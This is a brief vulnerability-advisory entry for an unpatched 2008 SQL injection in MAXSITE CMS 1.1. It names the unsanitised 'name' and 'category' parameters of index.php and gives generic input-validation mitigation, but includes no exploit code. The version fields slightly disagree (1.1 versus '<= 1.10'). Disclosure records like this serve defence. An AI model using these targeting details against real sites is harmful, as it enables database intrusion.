Vendor: MAXSITE
By: Tesz
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: MAXSITE
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE: N/A
CPE: a:maxsite:maxsite
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
CMS MAXSITE Remote SQL Injection Exploit <= 1.10
The vulnerability exists due to insufficient sanitization of user-supplied input in the 'name' and 'category' parameters of the 'index.php' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation allows an attacker to gain access to the vulnerable system.
Mitigation:
Input validation should be used to prevent SQL injection attacks. The application should sanitize user-supplied input before using it in SQL queries.